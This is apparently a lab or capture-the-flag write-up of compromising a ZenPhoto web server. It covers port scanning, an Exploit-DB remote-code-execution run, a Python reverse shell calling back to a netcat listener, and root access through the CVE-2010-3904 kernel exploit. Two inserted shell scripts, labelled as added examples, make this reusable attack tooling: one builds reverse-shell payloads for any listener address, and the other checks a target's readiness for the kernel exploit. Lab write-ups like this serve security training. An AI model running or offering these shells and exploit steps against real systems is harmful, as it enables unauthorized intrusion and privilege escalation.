# ZenPhoto

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a1f15e30464e92455c1922382f0561c6409ad722%2Fimage.png?alt=media)

## Nmap

```
nmap -sS -sV -p- 192.168.59.41

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp   open  ipp     CUPS 1.4
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## HTTP

Given the open ports and the service versions running on them, I am going to jump straight into port 80.

![http://192.168.59.41/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c690191786df19d272c7d28ba557502566fdcbe7%2Fimage.png?alt=media)

The root page for the target machine is a blank page headed 'UNDER CONSTRUCTION'. The next step is directory enumeration and a `nikto` scan.

`feroxbuster` and `nikto` both pick up the directory /test/ and the sub-directories beneath it.

![Feroxbuster](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae09cfa19238adf482fb70258c4d7e1a254888e7%2Fimage.png?alt=media)

![Nikto](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4cfd8a0666d6e120935e6d4f52a8ed1f92bac46a%2Fimage.png?alt=media)

The /test/ directory takes us to the following page, which, as the footer in the bottom right shows, is running on ZenPhoto.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2c47fc863f606754f4af4414dc4c2aea09138e25%2Fimage.png?alt=media)

Viewing the page source and scrolling to the bottom reveals the exact version of ZenPhoto that the target is running. This version string is what drives the exploit search in the next section.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3399823b3bcdfd3f66db5cf1439f29a1d8bec818%2Fimage.png?alt=media)

## Exploitation

A quick Google search for an exploit against this version of ZenPhoto turns up an RCE exploit on Exploit-DB.

{% embed url="https://www.exploit-db.com/exploits/18083" %}

I downloaded the exploit and ran it with the following syntax, where `<ZenPhoto-Dir>` is the web path ZenPhoto is installed under (here `/test/`):

```
php exploit.php <Target-IP> <ZenPhoto-Dir>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7176156ef363413802c5e55aa85dcd437519ad6e%2Fimage.png?alt=media)

## Stable Shell

We now have a shell on the target machine, running as the user www-data. I found with this shell that when you tried changing directories or running scripts it behaved unexpectedly.

I performed a quick check to see if Python was installed using `which python`. After confirming Python was installed, I tried a quick one-liner reverse shell to get a more stable one.

First I started a `netcat` listener on my attacking machine:

```
sudo nc -lvp 443
```

Then run the following command on the target machine, replacing `IP` with the address of the attacking machine:

```
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

We now have a more stable shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dbfff93fcb376fda0e3653e36944e8332c19c060%2Fimage.png?alt=media)
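The one-liner above hard-codes the interpreter name and the listener address. As an added example that is not part of the original write-up, the following shell helpers do the same two steps the text describes (confirm a Python interpreter exists, then build the pty reverse shell for it) in a reusable form; the `10.0.0.5` address, the `REVSHELL_DEMO` switch and the function names are my own placeholders, not values from the page.

```shell
#!/bin/sh
# Added example, not from the original write-up: locate a Python interpreter on
# the target and build the matching pty reverse-shell one-liner for it.

# Return the first Python interpreter found on PATH (python3 first, since the
# page's bare "python" is missing on newer targets), or fail if none exists.
find_python() {
    for p in python3 python python2; do
        if command -v "$p" >/dev/null 2>&1; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# Build the reverse-shell command for a given interpreter, listener IP and port.
# Same technique as the page's one-liner: connect a TCP socket, dup2() it over
# stdin/stdout/stderr, then spawn bash inside a pty so interactive tools and
# "cd" behave. The list comprehension works on both Python 2 and 3.
build_revshell() {
    interp=$1; ip=$2; port=$3
    printf '%s -c %s\n' "$interp" \
        "'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'"
}

# Demo: print the payload for a placeholder listener (10.0.0.5:443 is assumed).
# After the shell connects, finish the upgrade on the attacking side with
# Ctrl-Z, "stty raw -echo; fg", then "export TERM=xterm" in the new shell.
if [ -n "${REVSHELL_DEMO:-}" ]; then
    if py=$(find_python); then
        build_revshell "$py" 10.0.0.5 443
    else
        echo "no python interpreter found; try perl or bash /dev/tcp instead" >&2
    fi
fi
```

Run it with `REVSHELL_DEMO=1 sh revshell.sh` on the target to print the command to paste, with the listener from the text (`sudo nc -lvp 443`) already waiting.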

## Privilege Escalation

I then started a Python `SimpleHTTPServer` on my attacking machine and used it to download some privilege escalation scripts.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8230a90ec8e1d705d61ef86fd768ab0b1026a438%2Fimage.png?alt=media)

I executed `suggester.sh`, which flagged the following exploit as 'highly probable'.

```
[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
```

{% embed url="https://www.exploit-db.com/exploits/15285" %}
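The suggester matches on distribution and kernel tags, but a kernel exploit that misses can panic the box rather than hand over root, so it is worth confirming the preconditions by hand before running it. As an added example that is not part of the original write-up or of the exploit, the following shell checks do that for CVE-2010-3904: the kernel version is in the affected range (the RDS bug was introduced in 2.6.30 and fixed in 2.6.36-rc8), the `rds` module is loaded or can be autoloaded when the exploit creates an RDS socket, and a compiler is available if you intend to build on the target. The function names, the `RDS_TRIAGE` switch and the version-to-integer encoding are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up: pre-flight checks before
# running the CVE-2010-3904 RDS kernel exploit on a target.

# Turn a kernel release such as "2.6.32-21-generic" into one comparable integer
# (2006032): major*1000000 + minor*1000 + patch. The distro suffix after the
# first '-' and any fourth component are ignored.
kver_num() {
    v=${1%%-*}
    major=${v%%.*}
    rest=${v#*.}
    minor=${rest%%.*}
    if [ "$rest" = "$minor" ]; then
        patch=0
    else
        patch=${rest#*.}
        patch=${patch%%.*}
    fi
    case "$patch" in ''|*[!0-9]*) patch=0 ;; esac
    echo $(( major * 1000000 + minor * 1000 + patch ))
}

# CVE-2010-3904 affects 2.6.30 up to, but not including, 2.6.36-rc8.
# Returns 0 if the given release is inside that window. Release candidates of
# 2.6.36 before rc8 are reported as patched here; check those by hand.
rds_kernel_in_range() {
    n=$(kver_num "$1")
    [ "$n" -ge 2006030 ] && [ "$n" -lt 2006036 ]
}

# The exploit needs the rds module: already loaded, or present on disk and not
# blocked from autoloading by an "install rds /bin/true" style modprobe rule.
rds_module_available() {
    rel=${1:-$(uname -r)}
    grep -q '^rds ' /proc/modules 2>/dev/null && return 0
    [ -e "/lib/modules/$rel/kernel/net/rds/rds.ko" ] || return 1
    ! grep -rqsE '^[[:space:]]*install[[:space:]]+rds[[:space:]]' \
        /etc/modprobe.d /etc/modprobe.conf
}

# Returns 0 if gcc is on PATH, so the .c file can be built on the target.
target_can_compile() {
    command -v gcc >/dev/null 2>&1
}

# Demo: run the three checks against the live system and report each result.
if [ -n "${RDS_TRIAGE:-}" ]; then
    rel=$(uname -r)
    if rds_kernel_in_range "$rel"; then
        echo "[+] kernel $rel is inside the CVE-2010-3904 window"
    else
        echo "[-] kernel $rel is outside the CVE-2010-3904 window"
    fi
    if rds_module_available "$rel"; then
        echo "[+] rds module loaded or autoloadable"
    else
        echo "[-] rds module missing or blacklisted"
    fi
    if target_can_compile; then
        echo "[+] gcc present, can build on target"
    else
        echo "[-] no gcc, compile elsewhere against a matching glibc and copy the binary"
    fi
fi
```

Run with `RDS_TRIAGE=1 sh rds_triage.sh` in the www-data shell; if the module check fails the exploit cannot reach the vulnerable code path, and if the kernel check fails the suggester's tag match was on distribution name alone and another candidate should be chosen.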

I downloaded the file onto the attacking machine using `wget`, then compiled it with `gcc`.

```
gcc exploit.c -o exploit
```

After compiling finished, I used `chmod` to make the exploit executable.

```
chmod +x exploit
```

I then executed the exploit and was able to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-457b587ef48d8d75c140eb68c9b8e1bb5410295e%2Fimage.png?alt=media)
